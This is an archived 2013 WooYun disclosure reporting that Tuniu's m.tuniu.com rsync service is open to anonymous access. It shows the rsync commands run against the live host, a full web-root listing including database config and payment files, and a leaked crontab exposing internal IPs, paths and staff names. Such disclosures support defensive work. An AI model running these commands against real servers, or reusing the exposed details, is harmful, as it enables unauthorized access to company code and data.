途牛网某服务运维不当导致主站可以被入侵及渗透（涉及核心代码和数据）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-034704

漏洞标题：途牛网某服务运维不当导致主站可以被入侵及渗透（涉及核心代码和数据）

漏洞作者：结界师

提交时间：2013-08-19 10:25

修复时间：2013-10-03 10:26

公开时间：2013-10-03 10:26

漏洞类型：系统/服务运维配置不当

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-08-19：细节已通知厂商并且等待厂商处理中
2013-08-19：厂商已经确认，细节仅向厂商公开
2013-08-29：细节向核心白帽子及相关领域专家公开
2013-09-08：细节向普通白帽子公开
2013-09-18：细节向实习白帽子公开
2013-10-03：细节向公众公开

简要描述：

蘑菇总是长一片啊同样问题不会只有一个

详细说明：

rsync m.tuniu.com::
tuniuV2        	
hsww           	
framework      	
mnt_tuniuV2    	
html           	
images         	
hotelComment   	
docs           	
head           	
route_file     	
snapshots      	
special        	
vote_file      	
pic_adv        	
fb             	
cron

rsync m.tuniu.com::tuniuV2
drwxr-xr-x       12288 2013/08/16 18:25:27 .
-rw-r--r--         209 2013/07/10 09:42:49 .ip.php
-rw-r--r--        2345 2012/08/24 15:49:42 .main.html
-rw-r--r--       67698 2013/02/17 11:23:11 016882c1a5a107f3dbe8f2e615cdd3ac.png
-rw-r--r--       24058 2013/04/09 15:19:41 0199385aacc1b9f5ed15833907681532.png
-rw-r--r--       35174 2013/03/26 16:50:21 07d3c02d4e441cc0472127fe913425ce.jpg
-rw-r--r--       21467 2013/03/28 09:44:31 175ed3de66268ba2d41eab1ea77509d2.png
-rw-r--r--          48 2013/04/02 09:26:28 2013_04_02_unionpay_2_log.log
-rw-r--r--          48 2013/04/03 11:26:23 2013_04_03_unionpay_2_log.log
-rw-r--r--          48 2013/05/29 12:53:58 2013_05_29_unionpay_2_log.log
-rw-r--r--        1774 2011/06/08 15:34:03 222.php
-rw-r--r--      100084 2013/07/09 10:28:42 2ad48a7c5e8ac80f069ed53c12c5ffdd.jpg
-rw-r--r--       54996 2013/03/27 17:16:28 2d7fa2dff7f020edd1800ea70a2aed8e.png
-rw-r--r--      152796 2013/04/22 10:44:21 2e34d8cada098b7628b8393ffb0e226a.png
-rw-r--r--       72198 2013/02/06 16:15:54 2ee0040b2e36000b13c929fdb017fe2c.png
-rw-r--r--       24349 2013/02/27 18:09:02 3f37364166c8362b3c912bb15c750d03.png
-rw-r--r--       61274 2013/04/09 15:31:19 3fb248917237c7fc22dbe3e24da39c1c.jpg
-rw-r--r--       22213 2013/08/07 11:19:59 4279533d9954b0a402678e18990d052b.jpg
-rw-r--r--       31437 2013/02/06 16:29:58 510101092400bef6fe2cc75c635c36c5.png
-rw-r--r--          32 2013/01/24 13:31:49 55b02f1d51495b41524d8854feb0cceb.txt
-rw-r--r--         361 2012/10/30 15:16:37 56.php
-rw-r--r--       71898 2013/06/26 17:05:31 56e4c6bafaf5d9661aef0c480dae13fc.jpg
-rw-r--r--       35968 2013/04/01 10:56:10 577b95e712604f1475feb65ae1fe6e37.png
-rw-r--r--       28154 2011/09/06 12:18:05 58_socket.php
-rw-r--r--       74244 2013/08/09 17:10:00 59b75fdc168d6a19406cd0504ecad418.jpg
-rw-r--r--       55254 2013/03/13 11:43:00 5f5c7b080fec960399adaba6a0075680.png
-rw-r--r--       20497 2013/08/07 15:59:20 60629d6328af863bab49ddc7ba9e6c1f.jpg
-rw-r--r--       97492 2013/07/19 09:52:12 66ae1c0fca426ce918883da3576419f1.jpg
-rw-r--r--      109104 2013/05/20 14:21:19 68d6a7781fa6e863a1aee6b4de7cc2e1.jpg
-rw-r--r--      158352 2013/05/07 11:00:07 69624918833cdab269d013eb18df8d01.png
-rw-r--r--       29115 2013/08/02 17:47:17 76786b0ff10fc670ce7bbe55f21f33ec.jpg
-rw-r--r--      122392 2013/06/18 11:31:21 9ac15d7ae2452ee238114f1135b8b670.jpg
-rw-r--r--         910 2012/03/01 09:04:59 E:\ajax.txt
-rw-r--r--     3242080 2013/01/10 18:45:24 ONEBOX_XML_ROOTds_0_2000.xml
-rw-r--r--     2149071 2013/01/10 18:46:11 ONEBOX_XML_ROOTds_2000_4000.xml
-rw-r--r--     2108524 2013/01/10 18:46:59 ONEBOX_XML_ROOTds_4000_6000.xml
-rw-r--r--     1991552 2013/01/10 18:47:45 ONEBOX_XML_ROOTds_6000_8000.xml
-rw-r--r--          50 2013/01/10 19:05:13 ONEBOX_XML_ROOTmp_0_2000.xml
-rw-r--r--     3522599 2013/01/10 18:48:56 ONEBOX_XML_ROOTvs_0_2000.xml
-rw-r--r--     2189148 2013/01/10 18:54:46 ONEBOX_XML_ROOTvs_10000_12000.xml
-rw-r--r--     2148346 2013/01/10 18:55:41 ONEBOX_XML_ROOTvs_12000_14000.xml
-rw-r--r--     2333857 2013/01/10 18:56:31 ONEBOX_XML_ROOTvs_14000_16000.xml
-rw-r--r--     2082430 2013/01/10 18:57:24 ONEBOX_XML_ROOTvs_16000_18000.xml
-rw-r--r--     2212550 2013/01/10 18:58:17 ONEBOX_XML_ROOTvs_18000_20000.xml
-rw-r--r--     2183094 2013/01/10 18:59:04 ONEBOX_XML_ROOTvs_20000_22000.xml
-rw-r--r--     3292286 2013/01/10 18:50:11 ONEBOX_XML_ROOTvs_2000_4000.xml
-rw-r--r--     2489756 2013/01/10 19:00:08 ONEBOX_XML_ROOTvs_22000_24000.xml
-rw-r--r--     2489724 2013/01/10 19:01:31 ONEBOX_XML_ROOTvs_24000_26000.xml
-rw-r--r--     2638104 2013/01/10 19:02:34 ONEBOX_XML_ROOTvs_26000_28000.xml
-rw-r--r--     2640938 2013/01/10 19:03:50 ONEBOX_XML_ROOTvs_28000_30000.xml
-rw-r--r--     2543359 2013/01/10 19:05:13 ONEBOX_XML_ROOTvs_30000_32000.xml
-rw-r--r--     2993542 2013/01/10 18:52:18 ONEBOX_XML_ROOTvs_4000_6000.xml
-rw-r--r--     2675472 2013/01/10 18:53:09 ONEBOX_XML_ROOTvs_6000_8000.xml
-rw-r--r--     2269163 2013/01/10 18:53:55 ONEBOX_XML_ROOTvs_8000_10000.xml
-rw-r--r--        4675 2012/08/23 00:33:03 Partner_redirect.php
-rw-r--r--        4673 2012/08/22 23:40:56 Partner_redirect.php_bak
-rw-r--r--        3687 2012/06/18 18:08:41 Partner_socket.php
-rw-r--r--        1632 2012/06/18 18:08:42 Partner_socket_cpa.php
-rw-r--r--        6449 2012/07/07 00:51:41 Partner_socket_new.php
-rw-r--r--         234 2011/06/08 15:34:03 README.txt
-rw-r--r--        2369 2011/06/08 15:34:03 Rpc.cls.php
-rw-r--r--        8299 2011/06/28 16:36:18 TNSearch.class.php
-rw-r--r--       21938 2012/03/07 16:00:51 WEB-INF\classes\package_new\zzy_log.txt
-rw-r--r--       43876 2012/03/07 16:04:09 WEB-INF\classes\package_new\zzy_log2.txt
-rw-r--r--       72636 2013/02/27 18:18:00 a23878af836eab3fa68623c360817d2a.png
-rw-r--r--       44024 2013/08/02 17:47:00 a52f1320d764540839b421ec99733561.jpg
-rw-r--r--       54702 2013/03/19 10:15:17 af36f8c148a167fbe4472991b1cbbe81.png
-rw-r--r--       46038 2013/01/22 15:29:40 apc.php
-rw-r--r--         747 2011/06/08 15:34:03 area_cat.csv
-rw-r--r--         619 2011/06/08 15:34:03 bbs_phone.php
-rw-r--r--          16 2013/04/27 14:50:19 bdsitemap.txt
-rw-r--r--          16 2013/05/17 14:18:24 bdsitemap_for_uat.txt
-rw-r--r--        1747 2011/06/15 18:12:40 boss_request.php
-rw-r--r--        1281 2011/06/08 15:34:03 boss_request_218.php
-rw-r--r--       87053 2011/06/08 15:34:03 cat_data.php
-rw-r--r--      128900 2013/08/02 17:56:24 cd1674b0f1e14173a9ab0bf358d518ad.jpg
-rw-r--r--         621 2011/06/08 15:34:03 clear_cache.php
-rw-r--r--        4336 2011/06/08 15:34:03 contact.html
-rw-r--r--          37 2013/08/19 10:13:11 coupon.csv
-rw-r--r--        2557 2012/05/23 12:50:04 coupon.php
-rw-r--r--      150070 2013/06/05 17:42:21 da921d764778a339f2c5e628b2c6c5a4.jpg
-rw-r--r--        4675 2013/08/06 18:16:01 database_config.inc.php
-rw-r--r--       29371 2013/06/26 15:16:04 dd06f8b38cdfbf106a27915977ebe80b.jpg
-rw-r--r--       47770 2013/07/24 11:51:46 dde135ee18efb98ce2fb186b01e4e7da.jpg
-rw-r--r--       21832 2013/02/27 18:07:20 ded943f80f89049e4dc6eb7b8c237c4e.png
lrwxrwxrwx          28 2011/06/14 19:41:52 docs
-rw-r--r--       24022 2013/05/20 12:03:05 ef486e7b4c484d7d52324f809b650dcd.jpg
-rw-r--r--          33 2012/05/18 14:27:24 etao_domain_verify.txt
-rw-r--r--       38452 2013/02/27 18:11:21 f3b19ebcb045703f292e77c119a2c989.png
-rw-r--r--       54165 2013/02/06 15:33:03 fa0fa3fab00bd262385d4e6d193a28f1.jpg
-rw-r--r--        1150 2011/06/08 15:34:03 favicon.ico
-rw-r--r--      497778 2012/01/18 16:41:41 fb.log
-rw-r--r--        2346 2013/04/24 18:24:01 file.php
-rw-r--r--           2 2011/06/08 15:34:03 format
-rw-r--r--        5995 2013/05/30 16:45:52 ga.php
-rw-r--r--        1683 2013/04/23 14:59:38 get_file_mtime_and_size.php
-rw-r--r--         792 2011/06/08 15:34:03 get_identify.php
-rw-r--r--        1056 2011/06/08 15:34:03 globallog.php
-rw-r--r--          53 2011/06/08 15:34:03 google22c9485e25a97325.html
-rw-r--r--          53 2011/09/26 12:05:28 google8d58c0d3836178a9.html
-rw-r--r--        1299 2012/12/06 18:16:13 guideindex.php
-rwxr-xr-x        2072 2013/01/29 15:05:56 guideindex_xhprof.php
lrwxrwxrwx          28 2011/06/14 19:41:56 head
-rw-r--r--       29237 2011/10/18 19:50:20 hotel_new.css
lrwxrwxrwx          29 2011/06/14 19:41:58 icons
-rw-r--r--         227 2011/06/08 15:34:03 identify.php
-rw-r--r--         231 2012/10/15 12:09:21 identify2.php
-rw-r--r--         252 2012/01/14 15:52:36 identify2_check.php
-rwxr-xr-x        2084 2013/07/11 11:18:30 identify2_xhprof.php
lrwxrwxrwx          30 2011/06/14 19:42:01 images
-rw-r--r--      152713 2012/08/02 17:23:09 index-test.html
-rw-r--r--        7711 2013/08/12 18:57:56 index.php
-rw-r--r--        3480 2011/06/08 15:34:03 index2.php
-rw-r--r--       11769 2012/07/26 18:31:10 interface.php
-rw-r--r--        8250 2013/03/08 14:38:29 interface_doc.php
-rw-r--r--    10365825 2011/06/08 15:34:03 ip_address.php
-rw-r--r--          32 2011/06/08 15:34:03 kaixin001_platform_receive.txt
-rw-r--r--         350 2011/06/08 15:34:03 kx001_receiver.html
-rwxr-xr-x        3876 2013/05/08 18:19:56 main.php
-rwxrwxrwx        2066 2012/08/02 09:35:54 main_xhprof.php
-rw-r--r--       28936 2013/03/26 11:42:40 memcache.php
-rw-r--r--       29197 2013/07/26 13:56:52 memcache2.php
-rw-r--r--        3129 2011/06/08 15:34:03 notify_alipay.php
-rw-r--r--        7903 2012/07/07 00:53:23 order_data.php
-rw-r--r--         869 2011/06/08 15:34:03 phone.php
-rw-r--r--         574 2011/06/08 15:34:03 phonetest.php
-rw-r--r--        3845 2011/06/08 15:34:03 query.php
-rw-r--r--       16248 2011/06/08 15:34:03 qunar_socket.php
-rw-r--r--        3808 2011/06/08 15:34:03 r.php
-rw-r--r--        1624 2012/10/22 16:04:06 rewrite.php
-rw-r--r--        2069 2013/07/19 18:14:34 rewrite_xhprof.php
-rw-r--r--         625 2013/04/27 17:55:17 robots.txt
-rw-r--r--        1501 2013/04/12 16:55:31 robots_menpiao.txt
-rw-r--r--          26 2012/09/17 12:06:49 robots_special.txt
-rw-r--r--         755 2013/05/22 15:06:00 robots_www.txt
-rw-r--r--       13672 2011/06/08 15:34:03 route_email.php
lrwxrwxrwx          34 2011/06/14 19:42:05 route_file
lrwxrwxrwx          33 2011/06/14 19:42:09 route_img
-rw-r--r--       28204 2012/07/07 00:53:25 rpc.php
-rw-r--r--         147 2011/06/08 15:34:03 rpctest.php
-rw-r--r--        1792 2011/06/16 10:31:14 run.php
-rw-r--r--        9125 2011/06/08 15:34:03 sh_gn.html
-rw-r--r--      522160 2012/04/05 13:42:14 sitemap-cat.xml
-rw-r--r--      103586 2012/04/05 13:42:41 sitemap-dest.xml
-rw-r--r--     1059755 2012/10/15 15:37:07 sitemap-district.xml
-rw-r--r--     4483582 2012/04/05 13:43:46 sitemap-route.xml
-rw-r--r--     3987620 2012/10/15 15:37:20 sitemap-spot.xml
-rw-r--r--     2314460 2013/06/18 13:51:03 sitemap-topic.xml
-rw-r--r--      540315 2012/11/22 18:02:33 sitemap-topic.xml_bak
lrwxrwxrwx          33 2011/06/14 19:42:53 snapshots
-rw-r--r--       15726 2012/06/18 18:08:48 socket.php
lrwxrwxrwx          31 2011/06/14 19:42:59 special
-rw-r--r--       18641 2013/07/31 13:40:30 static_index.php
-rw-r--r--       19368 2013/01/17 18:51:32 static_index_for_test.php
-rwxr-xr-x        2074 2012/12/05 11:09:57 static_index_xhprof.php
-rwxr-xr-x       16354 2013/07/26 13:44:45 svnInfo.php
-rw-r--r--       16169 2013/05/18 10:00:08 svnInfo.php_0518
-rw-r--r--     1080363 2013/06/18 13:51:02 topic-del.txt
-rw-r--r--         921 2011/06/08 15:34:03 transfer.php
-rw-r--r--        1329 2011/06/08 15:34:03 transfer_channel.php
-rw-r--r--        1297 2011/06/08 15:34:03 transfer_partner.php
-rw-r--r--          20 2011/06/09 15:00:42 tttt.php
-rw-r--r--        1397 2011/06/08 15:34:03 tuniu400.xml
-rw-r--r--        8927 2011/06/08 15:34:03 tuniujieshao.xml
-rw-r--r--       33207 2011/06/08 15:34:03 tuniukefu.xml
-rw-r--r--         829 2011/06/08 15:34:03 tuniukefu1208.xml
-rw-r--r--         666 2012/05/24 11:51:40 ty_client_auto.html
-rw-r--r--         723 2011/06/08 15:34:03 ty_client_auto.html_bak0524
-rw-r--r--        1146 2011/06/28 19:07:13 ty_client_auto.php
lrwxrwxrwx          26 2011/06/14 19:43:04 ui
lrwxrwxrwx          33 2011/06/14 19:43:07 vote_file
-rw-rw-r--      306156 2013/02/04 11:15:34 waiting_time.html
-rw-rw-r--      306354 2013/02/04 12:45:18 waiting_time.php
-rw-r--r--        3666 2011/10/23 13:30:28 webqq_main.php
-rw-r--r--          32 2013/05/07 18:44:48 webscan_360_cn.html
-rw-r--r--         855 2011/06/08 15:34:03 weiyi_redirect.php
-rw-r--r--        2749 2011/06/08 15:34:03 weiyi_socket.php
-rw-r--r--         259 2011/12/28 11:37:44 wt4kUGHCQj-smovhotmln3w7JQU.html
-rw-r--r--         395 2011/06/08 15:34:03 xd_receiver.html
-rwxr-xr-x         674 2013/07/04 19:22:51 yii.php
-rwxr-xr-x         480 2012/10/11 01:57:46 yii_test.php
-rwxrwxr-x        2078 2013/05/10 15:00:56 yii_xhprof.php
-rw-r--r--       21940 2012/04/01 12:10:38 zzy_log.txt
-rw-r--r--       21938 2012/03/07 15:56:31 zzy_log2.txt
drwxr-xr-x        4096 2011/06/14 14:19:53 .static
drwxr-xr-x        4096 2013/08/12 18:57:57 .svn
drwxr-xr-x        4096 2011/11/26 10:30:57 .test
drwxr-xr-x        4096 2013/01/30 16:26:55 360
drwxr-xr-x        4096 2011/06/08 15:25:35 SHL
drwxr-xr-x        4096 2013/07/11 17:47:28 TNML
drwxr-xr-x        4096 2012/07/07 00:53:10 Temp
drwxr-xr-x        4096 2013/07/17 19:58:12 WEB-INF
drwxr-xr-x        4096 2011/10/18 19:22:33 ajaxupload
drwxr-xr-x        4096 2012/08/31 18:59:16 api
drwxr-xr-x        4096 2011/06/08 15:27:49 around
drwxr-xr-x        4096 2013/02/18 11:46:49 bank
drwxr-xr-x        4096 2012/03/16 10:09:56 bdb
drwxr-xr-x        4096 2012/12/12 18:10:36 cache
drwxrwxr-x        4096 2013/07/31 18:09:18 com
drwxr-xr-x        4096 2011/08/03 18:22:49 comm_file
drwxr-xr-x        4096 2013/08/12 18:57:55 component
drwxr-xr-x        4096 2012/12/18 18:42:28 conf
drwxr-xr-x        4096 2013/08/16 18:25:24 config
drwxr-xr-x        4096 2013/07/22 17:16:16 corp
drwxr-xr-x        4096 2011/07/04 19:27:40 css
drwxr-xr-x        4096 2011/06/08 15:27:49 db
drwxr-xr-x        4096 2011/06/08 15:32:01 dir
drwxr-xr-x        4096 2013/01/29 15:56:55 etao
drwxrwxrwx        4096 2011/06/08 16:26:18 file
drwxrwxrwx        4096 2013/01/15 15:46:48 gift
drwxrwxrwx        4096 2013/04/07 16:53:47 guide
drwxr-xr-x        4096 2013/08/08 16:43:26 help
drwxr-xr-x        4096 2011/06/08 15:32:15 hooks
drwxr-xr-x        4096 2013/07/18 14:17:14 html
drwxr-xr-x        4096 2011/06/08 15:32:20 html_cache
drwxr-xr-x        4096 2012/08/02 20:06:56 img
drwxr-xr-x        4096 2013/04/25 11:32:14 interface
drwxr-xr-x       12288 2013/05/27 22:31:59 js
drwxr-xr-x        4096 2011/06/08 15:25:54 jscripts
drwxr-xr-x        4096 2011/06/15 09:58:31 lang
drwxr-xr-x        4096 2011/06/08 15:32:01 locks
drwxr-xr-x        4096 2013/01/17 10:40:27 logs
drwxrwxr-x        4096 2013/06/15 10:13:20 maldives
drwxr-xr-x       20480 2013/04/24 11:33:55 market
drwxr-xr-x        4096 2011/06/08 15:25:54 misc
drwxr-xr-x        4096 2011/06/08 15:24:15 mixed
drwxr-xr-x       12288 2013/08/16 17:06:06 mod
drwxr-xr-x        4096 2013/08/08 19:20:00 mvc
drwxr-xr-x        4096 2013/01/10 11:29:17 online
drwxr-xr-x        4096 2013/04/24 18:14:13 partner_socket
drwxr-xr-x        4096 2013/07/10 14:55:00 payment
drwxr-xr-x        4096 2011/06/08 15:27:49 postlist
drwxr-xr-x        4096 2011/06/08 15:25:35 promotion
drwxr-xr-x        4096 2011/06/08 15:25:54 redirect
drwxr-xr-x        4096 2012/11/27 14:17:46 requirements
drwxr-xr-x       12288 2013/08/16 12:55:07 scripts
drwxr-xr-x        4096 2012/08/27 17:48:32 scroll
drwxr-xr-x        4096 2011/06/08 15:32:27 sitemap_file
drwxr-xr-x        4096 2011/06/08 15:24:11 smarttemplate
drwxr-xr-x        4096 2012/05/03 17:21:35 socket
drwxr-xr-x        4096 2013/08/16 18:25:25 sql
drwxr-xr-x        4096 2011/06/08 15:32:27 style
drwxr-xr-x        4096 2012/02/22 16:12:32 swf
drwxr-xr-x        4096 2013/08/05 23:46:08 task
drwxrwxrwx       36864 2013/08/12 20:38:07 template_c
drwxr-xr-x        4096 2011/06/08 15:32:20 testupload
drwxrwxr-x        4096 2013/01/05 16:18:57 ticket
drwxr-xr-x        4096 2011/06/08 15:24:18 tiny_mce
drwxr-xr-x        4096 2011/07/09 06:02:34 tmp
drwxr-xr-x        4096 2013/01/31 20:37:30 tours
drwxr-xr-x        4096 2013/06/24 15:55:50 tuniu_mvc
drwxr-xr-x        4096 2013/05/23 18:14:33 upload_interface
drwxr-xr-x        4096 2011/06/30 15:47:50 uploadify
drwxrwxrwx      131072 2012/08/20 16:32:25 visa_file
drwxrwxrwx        4096 2013/06/07 13:43:12 xhprof_html
drwxrwxrwx        4096 2012/06/25 20:42:16 xhprof_lib
drwxr-xr-x        4096 2011/06/08 15:24:15 yzwb
drwxrwxrwx        4096 2012/12/11 12:03:19 zhan
drwxr-xr-x        4096 2012/12/12 14:09:37 zhuanti

# HEADER: This file was autogenerated at Fri Apr 19 10:10:12 +0800 2013 by puppet.
# HEADER: While it can still be managed manually, it is definitely not recommended.
# HEADER: Note particularly that the comments starting with 'Puppet Name' should
# HEADER: not be deleted, as doing so could cause duplicate cron jobs.
0 1 * * * /bin/cat /usr/local/apache2/logs/www.tuniu.com-access_`/bin/date --date='1 days ago' +'\%Y\%m\%d'`.log > /opt/tuniu/mnt/logs/www/www.tuniu.com.`hostname`.log
0 12 * * * /bin/wget -O /opt/tuniu/www/html/tuniuV2/bdb/place_desc.db http://jingdian.tuniu.com/bdb/place_desc.db
*/20 * * * * /bin/rm -f /var/spool/clientmqueue/*
0 0 * * * /usr/bin/crontab -l > /opt/tuniu/mnt/backup/BJZW-101/crontab.`/bin/date +'\%Y\%m\%d'`
0 0 * * * cat /etc/rsyncd.conf > /opt/tuniu/mnt/backup/BJZW-101/rsyncd.`/bin/date +'\%Y\%m\%d'`
0 0 * * * cat /etc/hosts > /opt/tuniu/mnt/backup/BJZW-101/hosts.`/bin/date +'\%Y\%m\%d'`
0 1 * * * /bin/cat /usr/local/apache2/logs/www.tuniu.com-access_`/bin/date --date='1 days ago' +'\%Y\%m\%d'`.log > /opt/tuniu/mnt/logs/www/www.tuniu.com.`hostname`.log
*/10 * * * * /usr/bin/rsync -tvzrp --progress 172.22.0.133::pic_adv /opt/tuniu/www/html/tuniuV2/icons/pic_adv/
0 */6 * * * /usr/bin/rsync -tvzrp --progress 172.22.0.133::visa_file /opt/tuniu/www/html/tuniuV2/visa_file/
*/2 * * * * /usr/bin/rsync -tvzrpogl --progress --delete 172.22.0.133::olv /opt/tuniu/www/html/olv
*/2 * * * * /usr/bin/rsync -tvzrpogl --progress --delete 10.10.0.101::html/tuniuV2/upload_interface/ /opt/tuniu/www/html/file/upload_interface
*/2 4-23 * * * ( cd /opt/tuniu/www/html/tuniuV2/scripts/crm_relate; /usr/local/php/bin/php update_web_order_to_crm.php; )
2 5 * * * ( cd /opt/tuniu/www/html/tuniuV2/scripts/;    /usr/local/php/bin/php update_route_price.php; )
2 4 * * * ( cd /opt/tuniu/www/html/tuniuV2/scripts/crm_relate; /usr/local/php/bin/php update_channel_data_to_crm.php; )
30 5 * * * ( cd /opt/tuniu/www/html/tuniuV2/scripts; /usr/local/php/bin/php daily_traffic_statistics.php; )
#30 2-8 * * * ( cd /opt/tuniu/www/html/tuniuV2/scripts; /usr/local/php/bin/php update_weather.php;)
* * * * * ( cd /opt/tuniu/www/html/tuniuV2/scripts/crm_relate; /usr/local/php/bin/php update_user_order_pay_to_crm_new.php; )
#added by zouyulu
*/2 * * * * ( cd /opt/tuniu/www/html/tuniuV2/scripts/crm_relate; /usr/local/php/bin/php update_users.php; )
*/2 * * * * ( cd /opt/tuniu/www/html/tuniuV2/scripts/crm_relate; /usr/local/php/bin/php update_users2.php; )
5 0 * * * ( cd /opt/tuniu/www/html/tuniuV2/scripts; /usr/local/php/bin/php update_hot_route.php >> /opt/tuniu/mnt/logs/crontab_log/update_hot_route.log; )
0 0 * * * ( cd /opt/tuniu/www/html/tuniuV2/scripts/meicunbing_temp; /usr/local/php/bin/php update_visit_data.php>/opt/tuniu/mnt/logs/crontab_log/test.log; echo $(date) >>/opt/tuniu/mnt/logs/crontab_log/test.log; )
*/5 * * * * ( cd /opt/tuniu/www/html/tuniuV2/scripts/meicunbing_temp; /usr/local/php/bin/php memcache_del.php; )
#added by tanglei
*/30 * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/tanglei_temp; /usr/local/php/bin/php refresh_hotel_info.php;)
*/5 * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/tanglei_temp; /usr/local/php/bin/php update_partner_info.php;)
#0 */1 * * * ( cd /opt/tuniu/www/html/tuniuV2/scripts/tanglei_temp; /usr/local/php/bin/php update_order_recall.php; )
*/5 * * * * ( cd /opt/tuniu/www/html/tuniuV2/scripts/tanglei_temp; /usr/local/php/bin/php update_answer.php >> /opt/tuniu/mnt/logs/crontab_log/update_answer.log 2>&1 &)
0 1 * * * ( cd /opt/tuniu/www/html/tuniuV2/scripts/tanglei_temp; /usr/local/php/bin/php refresh_coupon.php; )
0 1 * * * ( cd /opt/tuniu/www/html/tuniuV2/scripts/tanglei_temp; /usr/local/php/bin/php refresh_ticket_order_num.php; )
*/5 * * * * ( cd /opt/tuniu/www/html/tuniuV2/scripts/tanglei_temp; /usr/local/php/bin/php weiyi_cid.php )
0 * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/tanglei_temp;/usr/local/php/bin/php update_hotel_room_plan.php)
*/20 * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/weizhifeng_temp; /usr/local/php/bin/php update_route_posts.php >> /opt/tuniu/mnt/logs/crontab_log/update_route_posts.log)
#*/10 * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/weizhifeng_temp; /usr/local/php/bin/php update_cat.php >> /opt/tuniu/mnt/logs/crontab_log/update_cat.log 2>&1 &)
#added by liuxiaotao
#30 10 * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/liuxiaotao_temp; /usr/local/php/bin/php email_login.php)
7 0 * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/liuxiaotao_temp; /usr/local/php/bin/php update_info.php)
#30 10 * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/liuxiaotao_temp; /usr/local/php/bin/php email_birth.php)
0 */6 * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/liuxiaotao_temp; /usr/local/php/bin/php update_wp_posts.php;)
*/2 * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/crm_relate; /usr/local/php/bin/php update_company_demand.php;)
*/30 * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/liuxiaotao_temp; /usr/local/php/bin/php update_package_price.php > upp`date +\%d`)
#0 */6 * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/liuxiaotao_temp; /usr/local/php/bin/php recall_image.php;)
* */1 * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/liuxiaotao_temp; /usr/local/php/bin/php get_groups.php;)
*/10 * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts; /usr/local/php/bin/php update_order_recall.php >> /opt/tuniu/mnt/logs/crontab_log/update_order_recall.log 2>&1 &)
0 0 * * * (cd /opt/tuniu/www/html/tuniuV2/scripts; /usr/local/php/bin/php sitemap.php;)
5 0 * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/liuxiaotao_temp; /usr/local/php/bin/php fengxiang.php;)
*/30 * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/liuxiaotao_temp; /usr/local/php/bin/php user_visit.php;)
#added by jibing 2009-05-25
*/10 * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/jibing/motopay; /usr/local/php/bin/php update_motopay.php;)
#added by zhangxiang
40 8 * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/zhangxiang; /usr/local/php/bin/php update_cmb_pay_encrypt_key.php)
*/3 * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/zhangxiang; /usr/local/php/bin/php cmb_pay.php)
* * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/crm_relate; /usr/local/php/bin/php RTX_to_crm.php >> /opt/tuniu/mnt/logs/crontab_log/log/rtx.log;)
#add by chenjianwei
*/5 * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/chenjianwei/; /usr/local/php/bin/php update_invoice.php >> /opt/tuniu/mnt/logs/crontab_log/update_invoice.`date +\%Y.\%m.\%d`.log 2>&1 &)
* * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/chenjianwei/; /usr/local/php/bin/php tourist_order_to_crm.php >> /opt/tuniu/mnt/logs/crontab_log/tourist_order_to_crm.`date +\%Y.\%m.\%d`.log 2>&1 &)
#* * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/chenjianwei/; /usr/local/php/bin/php open_affirm.php >> /opt/tuniu/mnt/logs/crontab_log/open_affirm.`date +\%Y.\%m.\%d`.log 2>&1 &)
* * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/chenjianwei/; /usr/local/php/bin/php tourist_insure.php >> /opt/tuniu/mnt/logs/crontab_log/tourist_insure.`date +\%Y.\%m.\%d`.log 2>&1 &)
*/5 * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/chenjianwei/; /usr/local/php/bin/php update_contract_download.php >> /opt/tuniu/mnt/logs/crontab_log/update_contract_download.`date +\%Y.\%m.\%d`.log 2>&1 &)
##*/10 * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/chenjianwei/; /usr/local/php/bin/php net_order_telnet_monitor.php >> /opt/tuniu/mnt/logs/crontab_log/net_order_telnet_monitor.php.`date +\%Y.\%m.\%d`.log 2>&1 &)
#added@20100926 by chenjianwei
* * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/chenjianwei/; /usr/local/php/bin/php task_scripts.php&  >> /opt/tuniu/mnt/logs/crontab_log/task_scripts.php.`date +\%Y.\%m.\%d`.log 2>&1 & )
#added@20101022 by chenjianwei
*/5 * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/xudan/; /usr/local/php/bin/php netease_cid.php)
#added@20110125 by chenjianwei
*/5 * * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/crm_relate/; /usr/local/php/bin/php update_user_order_pay_to_crm_new2.php )
#flush tt
*/5 * * * * (cd /opt/tuniu/www/html/tuniuV4backend/scripts/model/; /usr/local/php/bin/php update_cat_model.php >> /tmp/update_cat_model.log )
#30 */2 * * * (cd /opt/tuniu/www/html/tuniuV4backend/scripts/model/; /usr/local/php/bin/php update_cat_group_model.php >> /opt/tuniu/mnt/logs/chenjianwei/update_cat_group_model.log)
#added@20110805 by zhangshilin
0 */6 * * * (cd /opt/tuniu/www/html/tuniuV2/scripts/zhangshilin; /usr/local/php/bin/php ./calculate_holiday_place.php >> /opt/tuniu/mnt/logs/zhangshilin/calculate_holiday_place.log)
#added@20110811 by shinan
